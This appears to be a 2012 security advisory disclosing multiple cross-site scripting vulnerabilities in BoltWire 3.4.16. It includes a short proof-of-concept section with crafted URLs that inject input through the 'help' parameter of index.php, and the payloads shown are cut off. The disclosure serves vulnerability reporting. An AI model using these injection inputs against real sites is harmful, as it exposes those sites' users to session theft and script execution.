Advisory: BoltWire 3.4.16 Multiple XSS vulnerabilities Advisory ID: SSCHADV2012-001 Author: Stefan Schurtz Affected Software: Successfully tested on BoltWire 3.4.16 Vendor URL: http://www.boltwire.com/ Vendor Status: informed ========================== Vulnerability Description ========================== BoltWire 3.4.16 is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/bolt/field/index.php?p=main&help='" http://[target]/bolt/field/index.php?"